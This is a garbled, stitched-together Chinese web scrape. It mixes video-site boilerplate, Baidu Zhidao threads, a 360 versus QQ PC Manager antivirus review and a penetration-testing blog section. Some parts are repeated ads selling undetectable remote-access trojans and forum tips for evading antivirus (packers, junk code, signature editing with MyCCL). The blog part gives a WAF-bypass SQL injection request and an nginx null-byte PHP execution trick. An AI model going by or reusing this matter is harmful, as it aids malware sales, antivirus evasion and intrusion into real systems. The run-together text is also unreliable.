免杀部落可免扫描但是在网络接收后360提示高风险 怎么破

更多频道内容在这里查看
爱奇艺用户将能永久保存播放记录
过滤短视频
暂无长视频(电视剧、纪录片、动漫、综艺、电影)播放记录,
使用您的微博帐号登录,即刻尊享微博用户专属服务。
使用您的QQ帐号登录,即刻尊享QQ用户专属服务。
使用您的人人帐号登录,即刻尊享人人用户专属服务。
方式2:免费发送短信到手机
请输入正确的手机号
此短信不收取任何费用,保证您的手机号安全不被泄露
下载APP到本机
当前浏览器仅支持手动复制代码
视频地址:
flash地址:
html代码:
收藏成功,可进入查看所有收藏列表
爸爸去哪儿2游戏 立即参与
30秒后自动关闭
出售免杀远控,360全套 金山全套 管家 QQ 无提示 重启上线。
发布时间:
播放量数据:
出售免杀远控,360全套 金山全套 管家 QQ 无提示无拦截 重启上线,QQ
出售免杀远控,360全套 金山全套 管家 QQ 无提示无拦截 重启上线,QQ
你可能还想订阅他们:
&正在加载...
由于版权原因,此视频暂不支持播放
Sorry,due to copyright issues
you can’t watch the video
这些视频最近很火,赶紧看看吧
很抱歉,您所观看的视频已经下线
这些视频最近很火,赶紧看看吧
呃......网络出错了
Hi,{{username}}:
,请继续享受影片无限看、全站无广告等特权。
您的会员还有{{_remainDays}}天就要到期了
VIP还有{{_remainDays}}天到期
您的会员已经过期{{_remainDays}}天
VIP已过期{{_remainDays}}天
您使用浏览器不支持直接复制的功能,建议您使用Ctrl+C或右键全选进行地址复制
色情低俗内容
血腥暴力内容
广告或欺诈内容
侵犯了我的权力
还可以输入300字
&li data-elem="tabtitle" data-seq="{{seq}}"&
&a href="javascript:void(0);"&
&span>{{start}}-{{end}}&/span&
&li data-downloadSelect-elem="item" data-downloadSelect-selected="false" data-downloadSelect-tvid="{{tvid}}"&
&a href="javascript:void(0);"&{{pd}}&/a&
选择您要下载的《》剧集:
安装爱奇艺视频客户端,
马上开始为您下载本片
5秒后自动消失
免费发送到手机,下载手机APP
请输入正确的手机号
此短信不收取任何费用,保证您的手机号安全不被泄露木马免杀的问题。 怎么免杀360 和QQ电脑管家? 有没有稀有中文强壳?_百度知道
木马免杀的问题。 怎么免杀360 和QQ电脑管家? 有没有稀有中文强壳?
金山毒霸;16层防护.html" target="_blank">http、小红伞以及趋势科技的四种病毒检测查杀技术尊敬的用户你好,“1”指的是此次新推出的因木马损害而造成系统文件崩溃从而实现自主修复功能,严密防范病毒.qq.qq、生活愉快://guanjia.5版本!最新电脑管家下载地址 <a href="http;“4+1”芯引擎.com/download:建议使用最新7、电脑入侵,汇集电脑管家云查杀。省心+安全的全新版本恭候您的体验,“管理+杀毒”二合一://guanjia,杀毒实力跻身全球第一阵营,祝您工作,无需另外安装杀毒软件,权威认证.com/download
其他类似问题
qq电脑管家的相关知识
其他5条回答
好现在360安全卫士的木马防御和查杀能力强,一般做它的免杀很不容易
怎么免杀360?
哎 真不知道怎么说 免杀360的方法太多了 是你自己想不到而已 有必要用什么强壳?
就简简单单加个北斗在改壳 花 双跳转就行
还有其他很多方法 自己好好想一下吧
现在手动吧。加壳不行了。360的跟新太快了、Myccl 自己去研究。修改特征码。可以维持1天左右。建议学习。无参考。望采纳。
您好,最近版7.6 QQ管家拥有超强的杀毒能力,一般木马是不能被免杀的。
安全辅助软件大体作用是用来辅助杀毒软件来加强操作系统安全性,并且附加操作系统优化、软件使用痕迹、网络监控等的辅助功能,在国内知名的360安全卫士、QQ电脑管家、金山卫士都属于安全辅助软件。  有多少用户都在犹豫着一个问题“QQ电脑管家和360哪个好?”接下来我们就围绕着这个问题来一起探讨一下,到底QQ电脑管家和360哪个好,它们分别又适用于哪些人群。  测试操作系统采用Windows 7 旗舰版SP1,安全补丁截至到2012年3月,安装软件有:Adobe Photoshop CS5、WinRAR、Microsoft Office 2010、Microsoft Silverlight 4.1.10111.0、SnagIt 9.02、EmEditor8.04、IE Flash Activex 11.1.102.63、微软拼音 2010、Adobe AIR 3.1.0.4880。  测试前先将系统做个Ghost备份,在测试完一个测试软件后进行Ghost操作将系统还原到初始状态,再进行另一个软件的测试。  一、QQ电脑管家和360哪个好 系统安全度评分  国内的安全辅助软件目前都流行对操作系统安全度来进行打分操作,打分实行百分制当然是越高越好,基本上是从这些方面(操作系统有无目前已发现的高危漏洞、有无风险文件、有无恶意插件、最近有无进行过病毒木马扫描、有无安装杀毒软件)来进行综合评分的,那么,来看看360安全卫士和QQ电脑管家对本台评测电脑操作系统的安全度打分情况吧。  360安全卫士  对系统评分(38分),对得分的评价(处于非常危险状态),评分用时(83秒)。  高危漏洞8个(包含系统及Microsoft Office)。  浏览器收藏夹异常项目(4个)。  未安装杀毒软件(点击&安装&进行修复则自动安装360杀毒)。  未进行过系统扫描。  发现垃圾文件。  禁止开机启动程序。  发现差评插件(emeditor目录下的template.vbs)误报。  建议使用360安全浏览器。图1 QQ电脑管家和360哪个好:360安全卫士体检得分  点评:  360安全卫士的体检功能将检测结果分为了危险项目、优化项目及安全项目3大类,分类较为明确,需检测项目也比较的全面。  QQ电脑管家  对系统评分(59分),对得分的评价(发现两个风险项请立即优化),评分用时(26秒)。  IE风险项。  7个高危漏洞(包含系统及Microsoft Office)。  主页未锁定。  未安装杀毒软件。  4款可升级软件。  发现垃圾文件。  最近没有进行木马扫描。  启动项过多。图2 QQ电脑管家和360哪个好:QQ电脑管家系统评分  点评:  QQ电脑管家的体检功能将检测结果分为了系统风险项、可优化项及安全项3大类,分类明确,没有误导用户安装其他软件的项目。  此项对比总结:  360安全卫士与QQ电脑管家都对高危漏洞、有无风险文件、有无恶意插件、最近有无进行过病毒木马扫描、有无安装杀毒软件这些重点的项目进行了检测,并且给出了解决方案。  不同的是没有安装杀毒软件的修复方面,360安全卫士只提供了360杀毒这一项选择,而QQ管家则推荐了多款主流杀毒软件供用户选择。另外360安全卫士建议使用360安全浏览器这一项也有变相强推的嫌疑。QQ电脑管家的评分较高,在笔者看来也比较的合理,评分速度也相对较快。  二、QQ电脑管家和360哪个好 系统漏洞检测与修复  目前系统与软件的漏洞层出不穷,作为用户来说,可以做的就只能是等相关厂商发布漏洞补丁后及时的进行漏洞修复操作,以免这些漏洞被黑客所利用。形象的说漏洞就像古时城墙的缺口,如果不及时修补,就会导致敌人的入侵,进而导致城池的失守。安全辅助软件其中一个很重要的功能就是协助用户自动检测厂商发布的漏洞补丁并自动下载安装这些补丁。  对于windows用户来说,目前最重要的有几类补丁:windows自身、Flash Activex以及各种应用软件补丁,来看看360安全卫士和QQ电脑管家的修补能力吧。  我们先来看看使用系统自带的升级工具Windows Update所检测到的需升级漏洞补丁。  检测到12个重要更新(KB2598039 KB982726 KB2553267 KB2553248 KB2553406 KB2653956 KB2679255 KB890830(恶意软件删除工具) KB2656373 KB2675157 KB15597(Windows Defender) IE9。  检测到35个可选更新(除一个为Microsoft Security Essentials外其它的皆为各国语言包 )。图3 Windows Update检测情况  360安全卫士所检测的需升级漏洞补丁及下载安装耗时  检测到8个高危漏洞(KB2653956 KB2675157 KB2656373 KB982726 KB2553248 KB2553267 KB2553406 KB2598039)。  检查到26个功能性更新补丁。  可保存补丁包源文件。  可自定义补丁下载路径。  可自动修复高危漏洞。  可边打补丁边下载或全部下载完再安装。  下载并安装高危漏洞补丁用时 9分26秒 平均补丁下载速度在200KB/s左右。  安装完补丁后重启电脑,再次检测到有一个高危漏洞(Flash Player安全更新KB370049)。图4 QQ电脑管家和360哪个好:360安全卫士检测结果  点评:  360安全卫士的修复漏洞功能检测迅速,但是下载补丁速度较慢,不过提供了自定义补丁下载路径,方便局域网用户使用内网服务器进行补丁下载操作,不知为何首次检测并没有检测到Flash Player安全更新补丁,不过在2次检测时成功检测出该补丁。  QQ电脑管家所检测的需升级漏洞补丁及下载安装耗时  检测到7个高危漏洞(KB2500170 KB KB2653956 KB2598039 KB2675157 KB2656373 Flashplayer )。  检测到功能性更新补丁21个。  检测到不建议安装补丁1个(windows恶意软件删除工具)。  可保存补丁包源文件。  可自动修复高危漏洞。  下载并安装高危漏洞补丁用时 2分12秒 平均补丁下载速度在300KB/s左右。图5 QQ电脑管家和360哪个好:QQ电脑管家检测情况  点评:  QQ电脑管家的修复漏洞功能检测同样迅速,下载补丁速度也较快。  此项对比总结:  可以看到两款参赛软件检测出来的高危漏洞不仅数量不同,而且补丁也不尽相同,与Windows Update对比之下,QQ电脑管家在漏洞检测中则少了KB982726 KB2553248这两个Office补丁。  另外在选择补丁方面QQ电脑管家没有全选功能,需要用户逐个选取(针对功能型补丁),漏洞检测修复方面360安全卫士较为精准。顺便说一下,并不是全部补丁都必须安装,有些未必下载安装的补丁会耗费额外的下载时间和带宽,并且会消耗系统资源与影响稳定性。  三、QQ电脑管家和360哪个好 实时监控能力对比  除了要做好城墙的修补工作,也要防止敌人利用各种手段混入城内搞破坏,大鱼都给杀毒软件给抓住了,那么安全辅助软件就抓抓细节之处,防止漏网之鱼吧。  360安全卫士实时监控项目  入口防御:网页安全防护、聊天安全防护、下载安全防护、u盘安全防护、黑客入侵防护。  隔离防护:隔离看片、隔离运行风险文件。  系统防御:网络安全防护、键盘记录防护、文件系统防护、驱动防护、进程防护、注册表防护。图6 QQ电脑管家和360哪个好:360安全卫士实时监控项目  QQ电脑管家实时监控项目  系统防火墙(保护系统文件、注册表、进程)。  网页防火墙。  U盘防火墙。  摄像头保护。  财产保护(聊天/网购/网游)。  下载保护。  漏洞防火墙。图7 QQ电脑管家和360哪个好:QQ电脑管家实时监控项目  此项对比总结  360安全卫士的防护功能还是蛮强悍的,从病毒木马常用的入侵的途径来入手,还包括了类似于Sandboxie的隔离防护功能,再加上简单的HIPS功能,这一系列体系将系统防护的较为严实。  QQ电脑管家的实时防护功能同样较为全面,不过与360安全卫士对比还是少了一些功能。这两款软件都没有实时文件监控功能,也就是说当用户对文件进行读取/写入/新建/运行等的操作时,是不受到这两款软件监控的。  四、QQ电脑管家和360哪个好 木马查杀功能对比  安全辅助软件虽然目前都还处于杀毒软件的助手位置,但是随着功能的不断增多与性能的不断增强,安全辅助软件大有将杀毒软件取而代之的趋势,如果说安装了安全辅助软件为什么还要安装杀毒软件,有个理由就是安全辅助软件没有实时文件监控功能,不是它们不能实现,而是特地不加入此功能。  4.1 所使用的杀毒引擎对比  360杀毒软件使用的杀毒引擎  360云查杀引擎。  360启发式引擎。  QVM人工智能引擎(默认未开启)。  小红伞本地引擎(默认未开启)。  QQ电脑管家使用的杀毒引擎  QQ电脑管家云查杀引擎。  金山云查杀引擎。  小红伞本次查杀引擎。  趋势本地查杀引擎(默认未开启)。  此项对比总结:  在查杀引擎方面,QQ电脑管家集合了除其自身外的3家知名杀毒软件查杀引擎,集大家之所长,查杀病毒能力应该不错,而360使用的4个引擎中有3个是其自家的。  4.2 快速扫描用时对比  360安全卫士快速扫描用时  耗时1分31秒。  发现恶意程序残留脚本文件(emeditor目录下的template.vbs)。图8 QQ电脑管家和360哪个好:360安全卫士快速扫描用时  QQ电脑管家快速扫描用时  耗时1分16秒。  发现桌面清理向导功能异常(笔者已手动关闭该功能)。  IE收藏夹可疑网址2个(笔者访问并无异常)。图9 QQ电脑管家和360哪个好:QQ电脑管家快速扫描用时  此项对比总结:  两个参赛软件都有误报,查杀速度都在2分钟之内,QQ电脑管家的快速扫描耗时更短。  4.3 病毒包测试对比(开启所有引擎)  测试项目:  笔者在各大安全论坛收集了一些参与测试的病毒样本外加收集的的病毒为一些最近及往年比较热门的病毒(2000个),测试前将参评软件升级为最新病毒库并开启所有附带查杀引擎,其它配置为默认。  个人收集并不具有广泛性,所以此测试仅供参考。笔者采取了计算扫描后剩余文件数量的方法,来确定最终成绩。所以对病毒的处理方式均选择删除或隔离方式。  360安全卫士病毒包查杀情况  发现1881个安全威胁。  扫描后病毒包剩余文件数127个,病毒查杀率为93.65%。图10 QQ电脑管家和360哪个好:360安全卫士病毒包查杀  QQ电脑管家病毒包查杀情况  发现1909个安全威胁。  扫描后病毒包剩余文件数120个,病毒查杀率为94%。图11 QQ电脑管家和360哪个好:QQ电脑管家病毒包查杀  此项对比总结  在此项测试中集大家之所长的QQ电脑管家果然表现不错,病毒查杀率为94%,360安全卫士稍微不敌,病毒查杀率为93.65%。  五、QQ电脑管家和360哪个好 硬件检测功能对比  自己的电脑性能到底如何?电脑里的配件都是那些牌子什么型号的?夏天到了,电脑部件的温度过高可是会引起死机的,那么CPU/硬盘/主板的温度是多少呢?还有硬件驱动可是个麻烦事,如何安装驱动呢?  目前安全辅助软件大多都加上了硬件检测功能,来看看360安全卫士和QQ电脑管家能否真正鉴别硬件,为了方便对比,此项测试请到了专精此项的驱动精灵2012软件来进行对比。  驱动精灵2012硬件检测情况  发现3个设备可升级驱动(AMD SMbus芯片驱动/声卡驱动/usb驱动)。  发现3款驱动可升级到认证版本(网卡驱动/指纹识别仪驱动/红外设备驱动)。图12 QQ电脑管家和360哪个好:驱动精灵硬件检查信息  360硬件大师硬件检测及工具  硬件识别。  驱动管理(没有设备需要安装驱动)。  温度监控(CPU 显卡 主板温度及CPU风扇转速)(带有悬浮框滚动显示温度)。  性能测试(综合得分2422分)。  功耗估算(大概值为228瓦)。  节能降温功能(关闭/智能降温/全面节能)。  附带显示器颜色质量测试/液晶显示器坏点测试/硬盘坏道测试工具。  图13 QQ电脑管家和360哪个好:360硬件大师硬件检测及工具  QQ硬件检测 功能检测情况  硬件识别。  驱动管理(全部已安装)。  温度监控(CPU 显卡 温度及CPU风扇转速)(带有悬浮框仪表盘及数字形式显示CPU温度及CPU内存占用率)。  性能测试(须更新评估组件 在测试完第一项显卡显示性能后探出错误框要求用户升级显卡驱动,安装最新显卡驱动后故障依旧,测试无法进行)。图14 QQ电脑管家和360哪个好:QQ硬件检测 功能检测情况  此项对比总结:  两款参评软件的硬件识别功能都不错,顺利检测出笔者电脑硬件配置,不过都不支持驱动升级功能(支持安装驱动功能),在温度检测中QQ电脑管家不支持主板温度检测,而且性能测试功能兼容性不佳。360安全卫士则附带有多款实用检测工具,这是QQ电脑管家所不具备的。  八、QQ电脑管家和360哪个好 优化清理功能对比  360安全卫士系统优化清理功能  清理插件功能(扫描出1建议清理插件 还是那个emeditor目录下的template.vbs,5保留插件360自身/微软office/wmp录制组件/adobe 下载组件/Flash控件)。  清理垃圾(系统垃圾文件/上网缓存文件/听歌看视频的缓存文件/应用程序垃圾文件)。  清理痕迹(上网痕迹/windows使用痕迹/办公软件使用痕迹/看过的视频痕迹/其它应用程序使用痕迹)。  优化加速(开机加速20项,系统加速3个)。  系统修复(常规系统异常检查修复,电脑诊所的问题形式修复)。  开机加速(启动项/计划任务/应用软件服务/系统关键服务)。图15 QQ电脑管家和360哪个好:360安全卫士电脑清理功能  QQ电脑管家系统优化清理功能  清理插件(扫描出8个插件 其中微软office/5个无效快捷方式/2个IE工具栏onenote按钮)。  清理垃圾(回收站/系统垃圾文件/上网缓存文件//听歌看视频的缓存文件/其他应用程序垃圾文件/注册表垃圾)。  清理痕迹(windows使用痕迹/网页浏览痕迹/浏览器搜索记录/网页保存密码/影音播放痕迹/办公文档痕迹/其它应用程序使用痕迹)。  开机加速(发现51个影响开机速度问题 其中可禁用项24个其他加速项27个 启动项服务项计划任务管理)。  系统加速(开关机加速/系统稳定/错误处理优化/文件系统优化/网络安全与速度优化/速度优化)。  系统修复(常规系统异常检查修复)。图16 QQ电脑管家和360哪个好:QQ电脑管家系统优化功能  此项对比总结:  两款参评软件几乎打成平手,双方都对系统的使用痕迹清理的比较彻底。  七、QQ电脑管家和360哪个好 网络流量监控功能对比  现在有许多用户在用3G无线上网,可是目前各个运营商大多都对3G流量进行了不同套餐的不同流量限制,超过流量的收费可不便宜。360安全卫士和QQ电脑管家能否帮助用户监控网络流量呢?  360流量防火墙网络监控功能  管理网速(查看联网程序上传下载速度/可限制上传速度)。  网络体检(检测可能引起网络故障的问题)。  网速保护(保护程序不被下载影响)。  局域网防护(防止来自局域网内攻击)。  3G助手(流量监控与超流量提醒,可根据运行商选择流量套餐/每月流量统计图表)。  无线路由防蹭网提醒。  网速测试。  网络连接(显示当前的联网程序机器连接端口目标地址)。  悬浮框(显示即时上传下载速度/CPU及内存占用率/总网络流量/最占网速程序/最占cpu程序/天气预报)。图17 QQ电脑管家和360哪个好:360安全卫士流量监控  QQ电脑管家网络监控功能  管理网速(查看联网程序上传下载速度/可限制上传下载速度)。  网络连接(显示当前的联网程序机器连接端口目标地址)。  网速保护(保护程序不被下载影响 智能/网页优先/游戏优先/暂不保护)。  3G助手(流量监控与超流量提醒,每月流量统计图表)。  网速测试。  悬浮框(显示即时上传下载速度)。图18 QQ电脑管家和360哪个好:QQ流量监控  此项对比总结:  QQ电脑管家的网速管理功能更为强悍一些,在功能方面则是360安全卫士较为全面一些。在悬浮框方面,360安全卫士提供的信息更为丰富一些。  八、QQ电脑管家和360哪个好 附加实用功能对比  360安全卫士其它附加实用功能  360安全桌面 (虚拟桌面 快速启动 桌面壁纸 众多应用 )。  360手机助手(安卓手机的管理助手)。  360保镖(加强系统安全,附带认证的网购及银行网站入口)。  360省电助手(帮助用户节约用电)。  360寝室必备(与多人合用宽带,快速知道哪个用户在大量占用带宽)。  断网急救箱(无法上网时的本地故障解决工具)。  软件卸载(帮助用户卸载不需要的软件 根据用户所安装的软件来分析软件性格)。  360性能体检(找出电脑变慢的原因)。  360游戏优化器(为玩游戏腾出内存 网速等资源)。  360电脑专家(让专业人士帮你解决电脑故障 限时免费及收费服务)。  360文件恢复(恢复误删除文件)。  360健康精灵(定时提醒用户休息 保护眼睛及颈椎)。  360密码安全鉴定器(鉴定密码强度)。  QQ电脑管家其它附加实用功能  管理右键菜单(系统及IE右键菜单管理)。  财产保镖(集合常用认证网站入口监控运行环境 防止进入钓鱼网站)  文件保险箱(创建加密本地存储空间 保障用户隐私文件不被窃取)。。  QQ安全(查看QQ账号安全度)。  顽固木马克星(强力查杀顽固木马)。  专家协助(请专家帮你解决电脑故障 收费项目)。  装机助手(备份及还原 驱动/软件/个人数据)。  健康小助手(定时提醒用户休息)。  网页游戏诊所(网页游戏无法显示 无法登陆等的问题解决工具)。  android管理(安卓手机的管理助手)。  QQ等级加速(登陆QQ账号可享受等级加速特权)。  此项对比总结:  两个参赛软件为用户提供的附加功能都比较的实用,而且附加功能还会随着软件的更新而不断增加,从总体上看,360安全卫士提供的附加功能比较的实用。  九、QQ电脑管家和360哪个好 资源占用对比测试  测试项目:  笔者记录了QQ电脑管家4.7在空闲时(开机5分钟内不运行其它任何程序时(静态),以及在进行病毒扫描时的资源占用情况(动态)。  在动态测试时,笔者选取在扫描期间的1分钟、2分钟、3分钟、4分钟、5分钟 这五个时间点进行即时数据的记录,并且计算它们的平均值作为测试结果。由于计算机配置不同,此项测试不代表所有计算机上的测试结果。  图19 QQ电脑管家和360哪个好:360安全卫士静止时资源占用图20 QQ电脑管家和360哪个好:QQ电脑管家静止时资源占用  在静止时,360安全卫士的资源占用情况为占用CPU资源 0-3%,占用内存资源37M左右。QQ电脑管家的资源占用情况为占用CPU资源 0-3%,占用内存资源36M左右。360安全卫士资源占用
CPU占用(%)
内存占用(K)
  在动态时,360安全卫士的资源占用情况为平均占用CPU资源13%,平均占用内存资源168M。QQ电脑管家的资源占用情况为平均占用CPU资源23.6%,平均占用内存资源382M左右。  此项对比总结:  从测试中可以看到360安全卫士与QQ电脑管家在静止时的资源占用情况打成平手,但是在动态测试时的资源占用QQ电脑管家则不敌360安全卫士,虽然占用的资源情况都比较的少。  总结  360安全卫士作为一款老牌的安全软件,整体的功能比较的全面,比较适合于电脑老手使用,Q身为后辈的QQ电脑管家也在不断的向前辈靠近,功能也比较的全面,使用比较的简单,适合于电脑初学者使用。
您可能关注的推广
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁360能完全查杀所有被免杀的病毒或木马吗?_百度知道
360能完全查杀所有被免杀的病毒或木马吗?
提问者采纳
什么杀毒软件也不能保证完全查杀所有木马,相对来说360杀毒很不错,杀毒能力强,它创新性地整合了四大领先防杀引擎,包括国际知名的BitDefender病毒查杀引擎、360云查杀引擎、360主动防御引擎、360QVM人工智能引擎。四个引擎智能调度,为您提供全时全面的病毒防护,不但查杀能力出色,而且能第一时间防御新出现的病毒木马。
其他类似问题
免杀的相关知识
其他6条回答
应该可以,你去文件隔离区看看
不行。 有的木马决定能过 360
也有可能会查出来
这个还是可以的,360杀毒还是不错的,它是很好的一款完全免费的杀毒,数亿的用户,是值得信任使用的,360杀毒占内存小,升级及时,采用四引擎强效杀毒技术,误杀率极低,查杀速度很快,升级很及时,得到大家的一致认可
您可能关注的推广
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁360安全卫士扫描出残余键值:注册表残余项XunLeiBHO7.1.4.2100dll,并认为是木马或高风险文件
360安全卫士扫描出残余键值:注册表残余项XunLeiBHO7.1.4.2100dll,并认为是木马或高风险文件
已经两次了,第一杀后重启就好了,还特地彻底删除且卸载和重装迅雷。过了大约几个星期,一次体检时,又出现了一模一样的情况,到底是怎么回事?
其实注册表不会存在病毒的,现在我来帮你细细分析一下(参考):1,可能是注册表被病毒感染,而变成病毒(其实我都没听说过这种病毒,(*^__^*)嘻嘻……)2,就是误杀。我原来用的就是360,但他杀毒真的有点差劲,虽然它是免费的,我想能做到这些就不错了,但现在不同是,金山毒霸也永久免费了,她的病毒库终究比360多,我原来也比较过,金山毒霸真的比他好,我建议你下载金山吧,可能你害怕360用惯了,其他的不适应,这点我原来也好怕,但你会发现其实都一样,360卫士和金山卫士都一样界面,我就知道这些了,迅雷很差劲,弹出的对话框很多,很烦。也希望你能舒心共享我的看法,让上网更轻松些
等待您来回答
电脑安全领域专家小站会根据您的关注,为您发现更多,
看到喜欢的小站就马上关注吧!
下一站,你会遇见谁的梦想?
最新最全的网络安全资讯!&时下最流行的攻击方式!&&尽在小站--&web渗透&欢迎关注!&&站长论坛--&&欢迎光临!
创新工厂安全宝安全防护绕过漏洞
漏洞详情简要描述:安全宝本质是CND加DDOS防护加web安全防护,其web安全防护功能存在漏洞,可以轻易绕过。详细说明:web安全防护就想到于一个WAF,但是WEB应用过于复杂,很容易就能绕过,如安全宝无法防护80SEC所发现的几种攻击方法:参考
/浅谈绕过waf的数种方法.html漏洞证明:如下面安全保护的网站,如果拦截到SQL注入攻击是405状态,用下面的包发送SQL注入攻击将绕过安全保护。
GET /xinxi/shownews.asp HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 ( MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.; .NET CLR 3.5.21022; .NET4.0C)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveHost: Pragma: no-cacheContent-Length: 21Content-Type: application/x-www-form-urlencoded
id=572' and 1=1--修复方案:web应用太复杂,还有各种复杂场景可以绕过类似的安全防护。版权声明:转载请注明来源&@
Nginx 0day 空字节执行漏洞
Nginx %00空字节执行任意代码(php)漏洞nginx 0.5.*nginx 0.6.*nginx 0.7 &= 0.7.65nginx 0.8 &= 0.8.37Possible Arbitrary Code Execution with Null Bytes, PHP, and Old Versions of nginxNgnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码In vulnerable versions of nginx, null bytes are allowed in URIs by default(their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h). Individual modules have the ability to opt-out of handling URIs with null bytes.However, in particular, the FastCGI module does not.
同志们~点击一下本站上面的分享按钮吧~~你们给力,我就给力,更多最新最ing 的黑客咨询,技术~关注web渗透小站吧~
0day搜索和下载站点
以后慢慢更新
Backtrack5 R1-cn蓝盾汉化测试版镜像下载
&下载地址:ed2k://|file|BT5-R1-CN.iso||1B1B0CE397E36B101E1AAF|h=L5WZNET7TAMXYISSLQDWHP6CR7VD535V|/&安装以及使用说明:
最佳的75个安全工具
最佳的75个安全工具工具:Nessus(最好的开放源代码风险评估工具)网址:
类别:开放源码平台:Linux/BSD/Unix简介:Nessus是一款可以运行在、BSD、Solaris以及其他一些系统上的远程安全扫描软件。它是多线程、基于插入式的软件,拥有很好的 GTK界面,能够完成超过1200项的远程安全检查,具有强大的报告输出能力,可以产生HTML、XML、LaTeX和ASCII文本等格式的安全报告,并且会为每一个发现的安全问题提出解决建议。--------------------------------------------------------------------------------工具:Ethereal(网络协议检测工具)网址:
类别:开放源码平台:Linux/BSD/Unix/Windows简介:Ethereal是一款的网络协议分析程序,支持Unix、
。借助这个程序,你既可以直接从网络上抓取数据进行分析,也可以对由其他嗅探器抓取后保存在硬盘上的数据进行分析。你能交互式地浏览抓取到的数据包,查看每一个数据包的摘要和详细信息。Ethereal有多种强大的特征,如支持几乎所有的协议、丰富的过滤语言、易于查看TCP会话经重构后的数据流等。--------------------------------------------------------------------------------工具:Snort(免费的入侵检测系统)网址:
类别:开放源码平台:Linux/BSD/Unix/Windows简介:Snort是一款轻量级的网络入侵检测系统,能够在IP网络上进行实时的流量分析和数据包记录。它不仅能进行协议分析、内容检索、内容匹配,而且能用于侦测诸如缓冲溢出、隐秘端口扫描、CGI攻击、SMB探测、操作系统指纹识别等大量的攻击或非法探测。Snort使用灵活的规则去描述哪些流量应该被收集或被忽略,并且提供一个模块化的探测引擎。--------------------------------------------------------------------------------工具:Netcat(网络瑞士军刀)网址:
类别:开放源码平台:Linux/BSD/Unix/Windows简介:一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能。--------------------------------------------------------------------------------工具:TCPDump/WinDump(用于网络监测和数据收集的优秀嗅探器)网址:,
类别:开放源码平台:Linux/BSD/Unix/Windows简介:Tcpdump是一款众人皆知和受人喜欢的基于命令行的网络数据包分析和嗅探工具。它能把匹配规则的数据包的包头给显示出来。你能使用这个工具去查找网络问题或者去监视网络上的状况。WinDump是Tcpdump在Windows平台上的移植版。--------------------------------------------------------------------------------工具:Hping2(类似ping的网络探测工具)网址:
类别:开放源码平台:Linux/BSD/Unix简介:hping2能发送自定义的ICMP/UDP/TCP包到目标地址并且显示包的响应情况。它有一个方便的traceroute模式,并且支持IP分片。这个工具在traceroute、ping和探测防火墙后的主机时特别有用。
工具:Firewalk(高级的traceroute)网址:
类别:开放源码平台:Linux/BSD/Unix简介:Firewalk使用类似traceroute的技术来分析IP包的响应,从而测定网关的访问控制列表和绘制网络图。2002年10月,这个一流的工具在原来的基础上进行了重新开发。需要注意到的是,Firewalk里面的大多数功能也能由Hping2的traceroute选项来实现。--------------------------------------------------------------------------------工具:Cain & Abel(穷人的L0phtcrack)网址:
类别:免费平台:Windows简介:Cain & Abel是一个针对Microsoft操作系统的免费口令恢复工具。它通过如下多种方式轻松地实现口令恢复:网络嗅探、破解加密口令(使用字典或强行攻击)、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议等。源代码不公开。--------------------------------------------------------------------------------工具:XProbe2(主动操作系统指纹识别工具)网址:
类别:开放源码平台:Linux/BSD/Unix简介:XProbe是一款测定远程主机操作系统类型的工具。它依靠与一个签名数据库的模糊匹配以及合理的推测来确定远程操作系统的类型,利用ICMP协议进行操作系统指纹识别是它的独到之处。--------------------------------------------------------------------------------------------------------------------------------------------------------------工具:SolarWinds Toolsets(大量的网络发现、监视、攻击工具)网址:
类别:商业平台:Windows简介:SolarWinds包含大量适合系统管理员做特殊用途的工具,与安全相关的工具包括许多的网络发现扫描器(network discovery scanner)和一个SNMP强力破解器。--------------------------------------------------------------------------------工具:NGrep(方便的包匹配和显示工具)网址:
类别:开放源码平台:Linux/BSD/Unix/Windows简介:NGrep在网络层实现了GNU grep的大多数功能,基于pcap,可以使你通过指定扩展的正则表达式或十六进制表达式去匹配网络上的数据流量。它当前能够识别流经以太网、PPP、 SLIP、FDDI、令牌网和回环设备上的TCP、UDP和ICMP数据包,并且和其他常见的嗅探工具(如tcpdump和snoop)一样,理解bpf 过滤机制。--------------------------------------------------------------------------------工具:Perl/Python(脚本语言)网址:,
类别:开放源码平台:Linux/BSD/Unix/Windows简介:当我们使用那些已经开发好的安全工具来处理任务时,别忘了能自己写出(或修改)安全程序也是一件非常重要的事情。利用Perl和Python能非常容易地写出用于系统测试、exploit和修补的脚本程序,使用包含Net::RawIP和协议实现等模块的CPAN(Comprehensive Perl Archive Network:)或类似的档案能帮助我们比较容易地进行相关的开发。--------------------------------------------------------------------------------工具:THC-Amap(应用程序指纹识别扫描器)网址:
类别:开放源码平台:Linux/BSD/Unix简介:由THC开发的Amap是一个功能强大的扫描器,它通过探测端口响应的应用程序指纹数据来识别应用程序和服务,远甚于通过缺省端口号来判断应用程序和服务的方法。--------------------------------------------------------------------------------工具:OpenSSL(最为重要的SSL/TLS加密库)网址:
类别:开放源码平台:Linux/BSD/Unix/Windows简介:OpenSSL项目是共同努力开发出来的一个健全的、商业级的、全开放的和开放源代码的工具包,用于实现接层协议(SSL v2/v3)和传输层安全协议(TLS v1)以及形成一个功效完整的通用加密库。该项目由全世界范围内志愿者组成的团体一起管理,他们使用Internet去交流、设计和开发这个 OpenSSL工具和相关的文档。工具:NTop(网络使用状况监测软件)网址:
类别:开放源码平台:Linux/BSD/Unix/Windows简介:Ntop是一款显示网络使用状况的流量监测软件,类似于UNIX平台上监视系统进程的top命令。在交互模式下,ntop会将网络的使用状况显示在用户的终端上;在Web模式下,ntop会做为一个web服务器,创建包含网络状况的HTML网页返回给用户。--------------------------------------------------------------------------------工具:Nemesis(命令行式的UNIX网络信息包插入套件)网址:
